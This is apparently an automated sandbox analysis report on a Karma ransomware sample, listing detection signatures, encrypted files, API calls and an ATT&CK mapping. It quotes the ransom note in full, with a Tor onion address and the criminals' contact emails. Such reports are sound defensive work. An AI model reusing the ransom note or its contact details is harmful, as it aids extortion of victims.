Windows Analysis Report pss.exe

Overview

General Information

Sample Name: pss.exe
Analysis ID: 467911
MD5: 56700917a7434e307531195e4102d7bf
SHA1: b396affd40f38c5be6ec2fc18550bbfc913fc7ea
SHA256: 3ff1b90dbad5d78397fdc731c3a3c080d91fc488ac9152793b538b74a1e2d8f3

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
May encrypt documents and pictures (Ransomware)
Found Tor onion address
Writes many files with high entropy
Writes a notice file (html or txt) to demand a ransom
Modifies existing user documents (likely ransomware behavior)
Uses 32bit PE files
One or more processes crash
Detected potential crypto function
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.]

  • System is w10x64
  • pss.exe (PID: 3296 cmdline: 'C:\Users\user\Desktop\pss.exe' MD5: 56700917A7434E307531195E4102D7BF)
    • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 400 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: pss.exe Virustotal: Detection: 49%
Source: pss.exe ReversingLabs: Detection: 45%
Source: pss.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_00402D30 CreateFileW,WriteFile,FindCloseChangeNotification,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\3D Objects\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\Adobe\

Networking:

Found Tor onion address
Source: KARMA-ENCRYPTED.txt68.0.dr String found in binary or memory: http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_00402320 GetTempPathW,GetProcessHeap,HeapAlloc,CreateFontW,GetDC,CreateCompatibleDC,SelectObject,GetTextExtentPoint32W,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,GetPixel,SetPixel,SetPixel,SetPixel,SetPixel,SetPixel,ReleaseDC,CreateFileW,WriteFile,WriteFile,WriteFile,WriteFile,CloseHandle,DeleteObject,DeleteObject,DeleteDC,DeleteObject,GetProcessHeap,HeapFree,SystemParametersInfoW

Spam, unwanted Advertisements and Ransom Demands:

May encrypt documents and pictures (Ransomware)
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\cache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\cache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\profiles\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\profiles\karma-encrypted.txtJump to behavior
Writes many files with high entropy
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei entropy: 7.99229627993
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl entropy: 7.99941171636
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL entropy: 7.9993492267
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL entropy: 7.9993747625
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL entropy: 7.99925606475
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL entropy: 7.9993838274
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl entropy: 7.99924388202
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl entropy: 7.99948781185
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL entropy: 7.9991112055
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL entropy: 7.99906080498
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl entropy: 7.99936425566
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL entropy: 7.99938995309
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL entropy: 7.99950474381
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx entropy: 7.99991264152
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\MMC\services entropy: 7.99788439229
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl entropy: 7.9947616583
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm entropy: 7.99013163613
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99876908693
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat entropy: 7.99918756717
Source: C:\Users\user\Desktop\pss.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.99662078948
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_storei.KARMA (copy) entropy: 7.99229627993
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.KARMA (copy) entropy: 7.99941171636
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\CHICAGO.XSL.KARMA (copy) entropy: 7.9993492267
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GB.XSL.KARMA (copy) entropy: 7.9993747625
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostName.XSL.KARMA (copy) entropy: 7.99925606475
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostTitle.XSL.KARMA (copy) entropy: 7.9993838274
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.KARMA (copy) entropy: 7.99924388202
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.KARMA (copy) entropy: 7.99948781185
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690.XSL.KARMA (copy) entropy: 7.9991112055
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.KARMA (copy) entropy: 7.99906080498
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.KARMA (copy) entropy: 7.99936425566
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\SIST02.XSL.KARMA (copy) entropy: 7.99938995309
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\TURABIAN.XSL.KARMA (copy) entropy: 7.99950474381
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.KARMA (copy) entropy: 7.99991264152
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\MMC\services.KARMA (copy) entropy: 7.99788439229
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Office\MSO1033.acl.KARMA (copy) entropy: 7.9947616583
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Application Data\Microsoft\Templates\Normal.dotm.KARMA (copy) entropy: 7.99013163613
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.KARMA (copy) entropy: 7.99876908693
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.KARMA (copy) entropy: 7.99918756717
Source: C:\Users\user\Desktop\pss.exe File created: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.KARMA (copy) entropy: 7.99662078948
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses. our group's only aim is to financially benefit from our brief acquaintance, this is a guarantee that we will do what we promise. scamming is just bad for business in this line of work. contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded. we advise you not to use any data recovery tools without leaving copies of the initial encrypted file. you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website. http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/ if a ransom is payed we will provide the decryption key and proof that we deleted you data. when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data. how to contact us: vincegilbert@tutanota.com jerseysmith1986@oni
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\3D Objects\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\AppData\Roaming\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\AppData\Roaming\Adobe\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\KARMA-ENCRYPTED.txt -> (same notice text as above)
Source: C:\Users\user\Desktop\pss.exe File dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\KARMA-ENCRYPTED.txt -> (same notice text as above)
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\pss.exe File moved: C:\Users\user\Desktop\NVWZAPQSQL.pdf
Source: C:\Users\user\Desktop\pss.exe File deleted: C:\Users\user\Desktop\NVWZAPQSQL.pdf
Source: C:\Users\user\Desktop\pss.exe File moved: C:\Users\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3
Source: C:\Users\user\Desktop\pss.exe File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3
Source: C:\Users\user\Desktop\pss.exe File moved: C:\Users\user\Desktop\SQSJKEBWDT.jpg
Source: pss.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_00402D30
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_00403780
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_004015A0
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_004036A0
Source: pss.exe Virustotal: Detection: 49%
Source: pss.exe ReversingLabs: Detection: 45%
Source: pss.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pss.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\pss.exe 'C:\Users\user\Desktop\pss.exe'
Source: C:\Users\user\Desktop\pss.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pss.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 400
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3296
Source: C:\Users\user\Desktop\pss.exe Mutant created: \Sessions\1\BaseNamedObjects\KARMA
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C32.tmp
Source: classification engine Classification label: mal68.rans.evad.winEXE@3/386@0/0
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: pss.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_00402760 CreateFileW,GetFileSizeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LoadLibraryW,GetProcAddress,SetFilePointerEx,SetLastError,WriteFile,GetLastError,GetLastError,GetLastError,SetFilePointerEx,WriteFile,GetProcessHeap,HeapAlloc,SetFilePointerEx,ReadFile,SetFilePointerEx,WriteFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindCloseChangeNotification,MoveFileW,GetProcessHeap,RtlAllocateHeap,SetFilePointerEx,ReadFile,SetFilePointerEx,WriteFile,GetProcessHeap,RtlFreeHeap
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_00402D30 CreateFileW,WriteFile,FindCloseChangeNotification,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\pss.exe API call chain: ExitProcess graph end node graph_0-791
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\3D Objects\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\
Source: C:\Users\user\Desktop\pss.exe File opened: C:\Documents and Settings\user\Application Data\Adobe\
Source: C:\Users\user\Desktop\pss.exe Code function: 0_2_004035D0 GetDriveTypeW,GetProcessHeap,HeapAlloc,CreateThread,Sleep,WaitForSingleObject,WaitForSingleObject
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmp Binary or memory string: Progman
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media 1 | Native API 1 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Replication Through Removable Media 1 | Screen Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 2
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 2 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Archive Collected Data 11 | Exfiltration Over Bluetooth | Proxy 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Peripheral Device Discovery 11 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
Behavior Graph (ID: 467911, Sample: pss.exe, Startdate: 19/08/2021, Architecture: WINDOWS, Score: 68)
  • Sample signatures: Multi AV Scanner detection for submitted file; Found Tor onion address
  • pss.exe started
    • Signatures: Writes a notice file (html or txt) to demand a ransom; May encrypt documents and pictures (Ransomware); Writes many files with high entropy; Modifies existing user documents (likely ransomware behavior)
    • Dropped: C:\Users\user\KARMA-ENCRYPTED.txt, ASCII
    • Dropped: C:\Users\user\Desktop\SQSJKEBWDT.jpg, data
    • Dropped: C:\Users\user\Desktop19VWZAPQSQL.pdf, data
    • Dropped: 57 other files (51 malicious)
    • WerFault.exe started; dropped C:\ProgramData\Microsoft\...\Report.wer, Little-endian
    • conhost.exe started

Source | Detection | Scanner | Label | Link
pss.exe | 49% | Virustotal | | Browse
pss.exe | 46% | ReversingLabs | Win32.Ransomware.Karma |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/ | 1% | Virustotal | | Browse
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/ | 0% | Avira URL Cloud | safe |

No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/ | KARMA-ENCRYPTED.txt68.0.dr | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
No contacted IP infos

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:467911
Start date:19.08.2021
Start time:05:59:59
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 3s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:pss.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.rans.evad.winEXE@3/386@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 100%)
  • Quality average: 85.2%
  • Quality standard deviation: 14.5%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 23.211.6.115, 13.89.179.12
  • Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, onedsblobprdcus17.centralus.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.
No simulations
No context
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\JSCache\GlobData.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):91
Entropy (8bit):6.021369777490013
Encrypted:false
Malicious:false
Reputation:low
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\JSCache\GlobSettings.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.161530687680467
Encrypted:false
Malicious:false
Reputation:low
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):706
Entropy (8bit):7.676113993274977
Encrypted:false
Malicious:false
Reputation:low
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):494
Entropy (8bit):7.558060732139472
Encrypted:false
Malicious:false
Reputation:low
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_store.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):10309
Entropy (8bit):7.983321589869112
Encrypted:false
Malicious:false
Reputation:low
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_storei.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):24221
Entropy (8bit):7.992296279927023
Encrypted:true
Malicious:true
Reputation:low
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_storek.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):333
Entropy (8bit):7.270414649645231
Encrypted:false
Malicious:false
Reputation:low
C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\addressbook.acrodata.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):14525
Entropy (8bit):7.987581155052435
Encrypted:false
Malicious:false
Reputation:low
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:Dyalog APL mapped file 32-bit version 246.248
Category:dropped
Size (bytes):333671
Entropy (8bit):7.999411716359313
Encrypted:true
Malicious:true
Reputation:low
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\CHICAGO.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):297086
Entropy (8bit):7.999349226696064
Encrypted:true
Malicious:true
Reputation:low
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GB.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):268739
Entropy (8bit):7.999374762502691
Encrypted:true
Malicious:true
Reputation:low
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostName.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):256427
Entropy (8bit):7.999256064752385
Encrypted:true
Malicious:true
Reputation:low
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostTitle.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251518
Entropy (8bit):7.999383827401665
Encrypted:true
Malicious:true
Reputation:low
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):284871
Entropy (8bit):7.99924388201897
Encrypted:true
Malicious:true
Reputation:low
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):294594
Entropy (8bit):7.999487811845438
Encrypted:true
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):270711
Entropy (8bit):7.999111205500655
Encrypted:true
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):217647
Entropy (8bit):7.999060804982078
Encrypted:true
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
